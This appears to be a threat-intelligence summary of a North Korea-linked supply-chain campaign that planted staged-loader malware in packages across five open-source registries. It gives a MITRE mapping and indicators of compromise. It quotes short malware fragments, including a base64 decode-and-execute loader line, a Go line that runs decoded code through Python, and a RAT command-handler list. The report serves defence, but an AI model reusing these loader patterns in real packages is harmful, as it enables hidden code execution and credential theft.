Threat Research

North Korea’s Contagious Interview Campaign Spreads Across 5…

SocketDev
North Korea’s Contagious Interview Campaign Spreads Across 5…
Contagious Interview published malicious packages across npm, PyPI, Go Modules, crates.io, and Packagist that impersonated legitimate developer tooling and acted as staged loaders to fetch and execute second-stage payloads. The cluster includes a Windows-heavy variant (license-utils-kit) with full RAT capabilities and leverages infrastructure such as apachelicense[.]vercel[.]app and 66[.]45[.]225[.]94 for delivery. #ContagiousInterview #license-utils-kit

Keypoints

  • Threat actors operating under aliases like golangorg, aokisasakidev, and maxcointech1010 published over a thousand malicious packages across five major open-source registries to extend a supply-chain loader playbook.
  • Most packages implement a consistent staged-loader workflow: contact a staging endpoint, parse a JSON downloadUrl, download a ZIP (e.g., ecw_update.zip), extract to a temp directory, and execute platform-specific payloads.
  • Malicious functionality is hidden behind plausible library APIs (e.g., logger methods, license lookup helpers, update/check functions), making casual review less likely to detect the malware.
  • Npm packages differ by fetching base64-encoded JavaScript and executing it in memory, while Python, Go, Rust, and PHP samples download and extract ZIP archives or spawn interpreters.
  • The license-utils-kit Windows variant contains a full RAT with remote shell, keylogging, browser and wallet theft, encrypted archiving, file exfiltration, and AnyDesk deployment capabilities.
  • Defensive actions included reporting and takedown requests to registries and GitHub; recommendations emphasize pinning dependencies, sandboxing packages, preserving registry metadata for faster clustering, and monitoring for remote-download/update behaviors.

MITRE Techniques

  • [T1195.001 ] Compromise Software Dependencies and Development Tools – Actor published malicious packages across registries to gain access (‘…published malicious packages across five open source ecosystems’).
  • [T1608.001 ] Stage Capabilities: Upload Malware – Loaders retrieve and deliver second-stage payloads via archives (‘…fetch ZIP archives such as ecw_update.zip, and deliver platform-specific second-stage payloads.’).
  • [T1036.005 ] Masquerading: Match Legitimate Resource Name or Location – Packages impersonated developer tooling and libraries to appear benign (‘…designed to impersonate legitimate developer tooling (such as debug, debug-logfmt, pino-debug, baraka, license…).’).
  • [T1059.007 ] Command and Scripting Interpreter: JavaScript – Npm packages decode and execute remote JavaScript in memory using new Function (‘constdecodedCode=Buffer.from(encodedMessage,’base64’).toString(‘utf8’); constdebugFunction=newFunction(‘require’,decodedCode)(require);’).
  • [T1059.006 ] Command and Scripting Interpreter: Python – Several loaders spawn Python interpreters to execute downloaded code (‘cmd := exec.Command(pyPath, “-c”, string([]byte(decodedStr))) // Executes threat actor-supplied decoded code’).
  • [T1027.013 ] Obfuscated Files or Information: Encrypted/Encoded File – Windows variant bundled obfuscated components that hide malicious capabilities (‘…bundles obfuscated components that, once deobfuscated, reveal browser theft, wallet theft…’).
  • [T1140 ] Deobfuscate/Decode Files or Information – Attack chain includes decoding/deobfuscation steps to reveal payloads and modules (‘once deobfuscated, reveal browser theft, wallet theft, sensitive-file collection…’).
  • [T1105 ] Ingress Tool Transfer – Loaders download archives and additional payloads from staging infrastructure and cloud links (‘download a zip archive, extract it into a temp directory, find a platform-specific payload, and execute it’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Packages contact staging endpoints over HTTP(S) to retrieve JSON with downloadUrl (‘contact https://apachelicense.vercel.app/getAddress?platform= with an HTTP POST’).
  • [T1005 ] Data from Local System – Primary objective is credential and browser data theft from compromised hosts (‘…focused on stealing credentials, browser data, password-manager contents, and cryptocurrency wallet data.’).
  • [T1082 ] System Information Discovery – Payloads use platform-specific artifact names and checks indicating system-aware behavior (‘…Unix-like payload names such as com.apple.systemevents and systemd-resolved.’).
  • [T1083 ] File and Directory Discovery – Loaders extract archives into temp directories and search for platform payloads (‘…download a ZIP archive, extract it into a temp directory, find a platform-specific payload, and execute it.’).
  • [T1217 ] Browser Information Discovery – Malware includes capabilities to locate and collect browser artifacts and related data (‘…browser theft, wallet theft, sensitive-file collection…’).
  • [T1555.003 ] Credentials from Password Stores: Credentials from Web Browsers – RAT aims to harvest credentials stored in browsers (‘…stealing credentials, browser data, password-manager contents…’).
  • [T1555.005 ] Credentials from Password Stores: Password Managers – Operation targets password-manager contents for credential theft (‘…stealing credentials, browser data, password-manager contents…’).
  • [T1119 ] Automated Collection – Command handlers and automated routines collect and prepare data for exfiltration (‘self.command_handlers = { … 4: self.run_browser_stealer, 8: self.upload_sensitive_files, 9: self.create_encrypted_archive … }’).
  • [T1041 ] Exfiltration Over C2 Channel – Collected data and payload results are exfiltrated over C2 and delivery channels controlled by the actor (implied by staged loaders and RAT exfiltration workflow; see ‘deliver platform-specific second-stage payloads’).
  • [T1657 ] Financial Theft – Malware targets cryptocurrency wallets and related financial data (‘…stealing … cryptocurrency wallet data.’).

Indicators of Compromise

  • [Malicious Packages ] Registry-distributed loader packages – dev-log-core, logger-base, and other packages such as logutilkit and license-utils-kit (and many more across npm, PyPI, Go, crates.io, Packagist).
  • [Domains / C2 Endpoints ] Staging and delivery infrastructure – apachelicense[.]vercel[.]app, logkit.onrender[.]com, ngrok-free[.]vercel[.]app (and other vercel/onrender hostnames observed).
  • [IP Addresses ] Secondary infrastructure cluster – 66[.]45[.]225[.]94 (used by the Windows-heavy variant), and other hosting endpoints observed.
  • [File Hashes (SHA-256) ] Second-stage payload evidence – 9a541dffb7fc18dc71dbc8523ec6c3a71c224ffeb518ae3a8d7d16377aebee58 (Linux), bb2a89001410fa5a11dea6477d4f5573130261badc67fe952cfad1174c2f0edd (macOS), and 7c5adef4b5aee7a4aa6e795a86f8b7d601618c3bc003f1326ca57d03ec7d6524 (Windows).
  • [GitHub Accounts ] Malicious or persona GitHub profiles – https://github[.]com/golangorg, https://github[.]com/aokisasakidev (and supporting accounts like maxcointech1010/maxcointech0000).
  • [Emails ] Maintainer/contact identifiers – aokisasaki1122@gmail[.]com, shiningup1996@gmail[.]com (linked to personas and package metadata).
  • [Filenames / Artifacts ] Delivery and payload artifacts – ecw_update.zip, systemd-resolved, com.apple.systemevents, start.pypy.exe (and other platform-specific payload names).
  • [Cloud Delivery Patterns ] Google Drive-based delivery – drive[.]google[.]com/file/d/, drive[.]usercontent[.]google[.]com/download?id=&export=download&confirm=t (used by loaders rewriting sharing links to direct-download form).
  • [Temporary Directory Names ] Extraction and temp artifacts – 410BB449A-72C6-4500-9765-ACD04JBV827V32V (used as extraction directory), and temp script/executable names like a91c2b7f-9d5f-487e-9e6f-63d1a42bf3db.tmp.

Read more: https://socket.dev/blog/contagious-interview-campaign-spreads-across-5-ecosystems